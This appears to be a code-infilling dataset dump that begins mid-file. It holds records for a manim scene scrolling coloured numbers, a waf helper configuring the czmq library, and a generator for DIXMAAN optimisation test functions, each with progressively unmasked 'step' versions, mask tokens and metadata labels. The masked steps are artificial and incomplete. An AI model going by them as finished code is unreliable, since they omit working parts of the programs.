text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,
text_7, text_8, text_9, text_10)
text_11 = Text('30898', color='#221F20').shift(DOWN)
text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)
text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)
text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)
text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)
text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)
text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)
text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)
text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)
text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,
text_16, text_17, text_18, text_19, text_20)
text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)
text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)
text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)
text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)
text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)
text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)
text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)
text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)
text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)
text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,
text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)
all_numbers_2.move_to(2 * UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,
rate_func=linear)
<|reserved_special_token_1|>
from manimlib.imports import *
class A_Scroller(Scene):
CONFIG={
"camera_config":{"background_color":"#FFFFFF"}
}
def construct(self):
text_1 = Text("3493", color="#DC3832")
text_2 = Text("3646", color="#221F20").shift(2*RIGHT)
text_3 = Text("4182", color="#2566AD").shift(4*RIGHT)
text_4 = Text("16417", color="#DC3832").shift(6*RIGHT)
text_5 = Text("18209", color="#221F20").shift(8*RIGHT)
text_6 = Text("18569", color="#2566AD").shift(10*RIGHT)
text_7 = Text("22229", color="#DC3832").shift(12*RIGHT)
text_8 = Text("24928", color="#221F20").shift(14*RIGHT)
text_9 = Text("26827", color="#2566AD").shift(16*RIGHT)
text_10 = Text("29779", color="#DC3832").shift(18*RIGHT)
line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6, text_7, text_8, text_9, text_10)
text_11 = Text("30898", color="#221F20").shift(DOWN)
text_12 = Text("31568", color="#2566AD").shift(2*RIGHT+DOWN)
text_13 = Text("32075", color="#DC3832").shift(4*RIGHT+DOWN)
text_14 = Text("32777", color="#221F20").shift(6*RIGHT+DOWN)
text_15 = Text("33959", color="#2566AD").shift(8*RIGHT+DOWN)
text_16 = Text("35450", color="#DC3832").shift(10*RIGHT+DOWN)
text_17 = Text("37680", color="#221F20").shift(12*RIGHT+DOWN)
text_18 = Text("38268", color="#2566AD").shift(14*RIGHT+DOWN)
text_19 = Text("38269", color="#DC3832").shift(16*RIGHT+DOWN)
text_20 = Text("38849", color="#221F20").shift(18*RIGHT+DOWN)
line_2 = VGroup(text_11, text_12, text_13, text_14, text_15, text_16, text_17, text_18, text_19, text_20)
text_21 = Text("44204", color="#2566AD").shift(2*DOWN)
text_22 = Text("44798", color="#DC3832").shift(2*RIGHT+2*DOWN)
text_23 = Text("44814", color="#221F20").shift(4*RIGHT+2*DOWN)
text_24 = Text("45084", color="#2566AD").shift(6*RIGHT+2*DOWN)
text_25 = Text("45252", color="#DC3832").shift(8*RIGHT+2*DOWN)
text_26 = Text("46041", color="#221F20").shift(10*RIGHT+2*DOWN)
text_27 = Text("46380", color="#2566AD").shift(12*RIGHT+2*DOWN)
text_28 = Text("47891", color="#DC3832").shift(14*RIGHT+2*DOWN)
text_29 = Text("51126", color="#221F20").shift(16*RIGHT+2*DOWN)
text_30 = Text("51599", color="#2566AD").shift(18*RIGHT+2*DOWN)
line_3 = VGroup(text_21, text_22, text_23, text_24, text_25, text_26, text_27, text_28, text_29, text_30)
all_numbers_1 = VGroup(line_1, line_2, line_3)
all_numbers_2 = all_numbers_1.copy()
all_numbers_1.move_to(2*UP).shift(20*RIGHT)
all_numbers_2.move_to(2*UP)
all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)
self.add(all_numbers)
self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10, rate_func=linear)
|
flexible
|
{
"blob_id": "97c97f18d1b93dc54538a0df7badafd961fdcb9c",
"index": 3588,
"step-1": "<mask token>\n\n\nclass A_Scroller(Scene):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass A_Scroller(Scene):\n <mask token>\n\n def construct(self):\n text_1 = Text('3493', color='#DC3832')\n text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)\n text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)\n text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)\n text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)\n text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)\n text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)\n text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)\n text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)\n text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,\n text_7, text_8, text_9, text_10)\n text_11 = Text('30898', color='#221F20').shift(DOWN)\n text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)\n text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)\n text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)\n text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)\n text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)\n text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)\n text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)\n text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)\n text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,\n text_16, text_17, text_18, text_19, text_20)\n text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)\n text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)\n text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)\n text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)\n text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)\n text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)\n text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)\n text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)\n text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)\n text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,\n text_26, text_27, text_28, text_29, text_30)\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)\n all_numbers_2.move_to(2 * UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,\n rate_func=linear)\n",
"step-3": "<mask token>\n\n\nclass A_Scroller(Scene):\n CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}\n\n def construct(self):\n text_1 = Text('3493', color='#DC3832')\n text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)\n text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)\n text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)\n text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)\n text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)\n text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)\n text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)\n text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)\n text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,\n text_7, text_8, text_9, text_10)\n text_11 = Text('30898', color='#221F20').shift(DOWN)\n text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)\n text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)\n text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)\n text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)\n text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)\n text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)\n text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)\n text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)\n text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,\n text_16, text_17, text_18, text_19, text_20)\n text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)\n text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)\n text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)\n text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)\n text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)\n text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)\n text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)\n text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)\n text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)\n text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,\n text_26, text_27, text_28, text_29, text_30)\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)\n all_numbers_2.move_to(2 * UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,\n rate_func=linear)\n",
"step-4": "from manimlib.imports import *\n\n\nclass A_Scroller(Scene):\n CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}\n\n def construct(self):\n text_1 = Text('3493', color='#DC3832')\n text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)\n text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)\n text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)\n text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)\n text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)\n text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)\n text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)\n text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)\n text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,\n text_7, text_8, text_9, text_10)\n text_11 = Text('30898', color='#221F20').shift(DOWN)\n text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)\n text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)\n text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)\n text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)\n text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)\n text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)\n text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)\n text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)\n text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,\n text_16, text_17, text_18, text_19, text_20)\n text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)\n text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)\n text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)\n text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)\n text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)\n text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)\n text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)\n text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)\n text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)\n text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,\n text_26, text_27, text_28, text_29, text_30)\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)\n all_numbers_2.move_to(2 * UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,\n rate_func=linear)\n",
"step-5": "from manimlib.imports import *\n\nclass A_Scroller(Scene):\n CONFIG={\n \"camera_config\":{\"background_color\":\"#FFFFFF\"}\n }\n def construct(self):\n text_1 = Text(\"3493\", color=\"#DC3832\")\n text_2 = Text(\"3646\", color=\"#221F20\").shift(2*RIGHT)\n text_3 = Text(\"4182\", color=\"#2566AD\").shift(4*RIGHT)\n text_4 = Text(\"16417\", color=\"#DC3832\").shift(6*RIGHT)\n text_5 = Text(\"18209\", color=\"#221F20\").shift(8*RIGHT)\n text_6 = Text(\"18569\", color=\"#2566AD\").shift(10*RIGHT)\n text_7 = Text(\"22229\", color=\"#DC3832\").shift(12*RIGHT)\n text_8 = Text(\"24928\", color=\"#221F20\").shift(14*RIGHT)\n text_9 = Text(\"26827\", color=\"#2566AD\").shift(16*RIGHT)\n text_10 = Text(\"29779\", color=\"#DC3832\").shift(18*RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6, text_7, text_8, text_9, text_10)\n\n text_11 = Text(\"30898\", color=\"#221F20\").shift(DOWN)\n text_12 = Text(\"31568\", color=\"#2566AD\").shift(2*RIGHT+DOWN)\n text_13 = Text(\"32075\", color=\"#DC3832\").shift(4*RIGHT+DOWN)\n text_14 = Text(\"32777\", color=\"#221F20\").shift(6*RIGHT+DOWN)\n text_15 = Text(\"33959\", color=\"#2566AD\").shift(8*RIGHT+DOWN)\n text_16 = Text(\"35450\", color=\"#DC3832\").shift(10*RIGHT+DOWN)\n text_17 = Text(\"37680\", color=\"#221F20\").shift(12*RIGHT+DOWN)\n text_18 = Text(\"38268\", color=\"#2566AD\").shift(14*RIGHT+DOWN)\n text_19 = Text(\"38269\", color=\"#DC3832\").shift(16*RIGHT+DOWN)\n text_20 = Text(\"38849\", color=\"#221F20\").shift(18*RIGHT+DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15, text_16, text_17, text_18, text_19, text_20)\n\n text_21 = Text(\"44204\", color=\"#2566AD\").shift(2*DOWN)\n text_22 = Text(\"44798\", color=\"#DC3832\").shift(2*RIGHT+2*DOWN)\n text_23 = Text(\"44814\", color=\"#221F20\").shift(4*RIGHT+2*DOWN)\n text_24 = Text(\"45084\", color=\"#2566AD\").shift(6*RIGHT+2*DOWN)\n text_25 = Text(\"45252\", color=\"#DC3832\").shift(8*RIGHT+2*DOWN)\n text_26 = Text(\"46041\", color=\"#221F20\").shift(10*RIGHT+2*DOWN)\n text_27 = Text(\"46380\", color=\"#2566AD\").shift(12*RIGHT+2*DOWN)\n text_28 = Text(\"47891\", color=\"#DC3832\").shift(14*RIGHT+2*DOWN)\n text_29 = Text(\"51126\", color=\"#221F20\").shift(16*RIGHT+2*DOWN)\n text_30 = Text(\"51599\", color=\"#2566AD\").shift(18*RIGHT+2*DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25, text_26, text_27, text_28, text_29, text_30)\n\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2*UP).shift(20*RIGHT)\n all_numbers_2.move_to(2*UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10, rate_func=linear)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
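The thirty Text(...) assignments above follow a strict pattern: three colors cycling left to right across rows, 2*RIGHT per column, DOWN per row. An equivalent loop-based construction sketch that could replace them inside construct (lines[0], lines[1], lines[2] correspond to line_1, line_2, line_3):

values = [
    ['3493', '3646', '4182', '16417', '18209',
     '18569', '22229', '24928', '26827', '29779'],
    ['30898', '31568', '32075', '32777', '33959',
     '35450', '37680', '38268', '38269', '38849'],
    ['44204', '44798', '44814', '45084', '45252',
     '46041', '46380', '47891', '51126', '51599'],
]
colors = ['#DC3832', '#221F20', '#2566AD']   # red, black, blue, cycling
lines = VGroup(*[
    VGroup(*[
        Text(v, color=colors[(row * 10 + col) % 3])
        .shift(2 * col * RIGHT + row * DOWN)
        for col, v in enumerate(line)])
    for row, line in enumerate(values)])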
import generic
name = __name__
def options(opt):
generic._options(opt, name)
def configure(cfg):
generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=
name.lower(), uses='LIBZMQ', mandatory=True)
|
normal
|
{
"blob_id": "9e511c769f6ccedc06845a382171fb3729913d05",
"index": 9767,
"step-1": "<mask token>\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\ndef configure(cfg):\n generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=\n name.lower(), uses='LIBZMQ', mandatory=True)\n",
"step-3": "<mask token>\nname = __name__\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\ndef configure(cfg):\n generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=\n name.lower(), uses='LIBZMQ', mandatory=True)\n",
"step-4": "import generic\nname = __name__\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\ndef configure(cfg):\n generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=\n name.lower(), uses='LIBZMQ', mandatory=True)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
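A wscript sketch for consuming the waf tool above, assuming the module is saved as czmq.py in a waftools/ directory and that generic._configure registers the dependency under the uppercased name CZMQ; both are assumptions, only the options/configure tool loading is standard waf:

def options(opt):
    opt.load('czmq', tooldir='waftools')    # pulls in the tool's options()

def configure(cfg):
    cfg.load('czmq', tooldir='waftools')    # runs the czmq.h / libczmq checks

def build(bld):
    bld.program(source='main.c', target='demo',
                use='CZMQ')                 # assumed uselib name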
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def DIXMAAN(type):
def DIXMAAN_(n):
name = 'DIXMAAN%c function (CUTE)' % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /
n) ** k2
sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4
f_1 = lambda : sum([sm2(i) for i in range(1, n)])
f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])
f = lambda : 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=
default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
<|reserved_special_token_1|>
<|reserved_special_token_0|>
table_DIXMAAN = dict()
table_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1
table_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0
table_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1
table_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1
table_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2
table_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2
def DIXMAAN(type):
def DIXMAAN_(n):
name = 'DIXMAAN%c function (CUTE)' % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /
n) ** k2
sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4
f_1 = lambda : sum([sm2(i) for i in range(1, n)])
f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])
f = lambda : 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=
default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
<|reserved_special_token_1|>
from .test_function import *
from .support_funcs import *
table_DIXMAAN = dict()
table_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1
table_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0
table_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1
table_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1
table_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2
table_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2
def DIXMAAN(type):
def DIXMAAN_(n):
name = 'DIXMAAN%c function (CUTE)' % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /
n) ** k2
sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4
f_1 = lambda : sum([sm2(i) for i in range(1, n)])
f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])
f = lambda : 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=
default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
<|reserved_special_token_1|>
from .test_function import *
from .support_funcs import *
table_DIXMAAN = dict()
table_DIXMAAN['A'] = (1, 0, 0.125, 0.125, 0, 0, 0, 0)
table_DIXMAAN['B'] = (1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1)
table_DIXMAAN['C'] = (1, 0.125, 0.125, 0.125, 0, 0, 0, 0)
table_DIXMAAN['D'] = (1, 0.26, 0.26, 0.26, 0, 0, 0, 0)
table_DIXMAAN['E'] = (1, 0, 0.125, 0.125, 1, 0, 0, 1)
table_DIXMAAN['F'] = (1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1)
table_DIXMAAN['G'] = (1, 0.125, 0.125, 0.125, 1, 0, 0, 1)
table_DIXMAAN['H'] = (1, 0.26, 0.26, 0.26, 1, 0, 0, 1)
table_DIXMAAN['I'] = (1, 0, 0.125, 0.125, 2, 0, 0, 2)
table_DIXMAAN['J'] = (1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2)
table_DIXMAAN['K'] = (1, 0.125, 0.125, 0.125, 2, 0, 0, 2)
table_DIXMAAN['L'] = (1, 0.26, 0.26, 0.26, 2, 0, 0, 2)
def DIXMAAN(type):
def DIXMAAN_(n):
name = "DIXMAAN%c function (CUTE)" % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 *(i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i+1) + xi(i+1)**2) * (i / n) ** k2
sm3 = lambda i: gamma * xi(i)**2 * xi(i+m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i+2*m) * (i / n) ** k4
f_1 = lambda: sum([sm2(i) for i in range(1, n)])
f_2 = lambda: sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda: sum([sm4(i) for i in range(1, m + 1)])
f = lambda: 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
|
flexible
|
{
"blob_id": "7026f4549019c25cb736af556fe46fd360fba46f",
"index": 2238,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef DIXMAAN(type):\n\n def DIXMAAN_(n):\n name = 'DIXMAAN%c function (CUTE)' % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /\n n) ** k2\n sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4\n f_1 = lambda : sum([sm2(i) for i in range(1, n)])\n f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])\n f = lambda : 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=\n default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_\n",
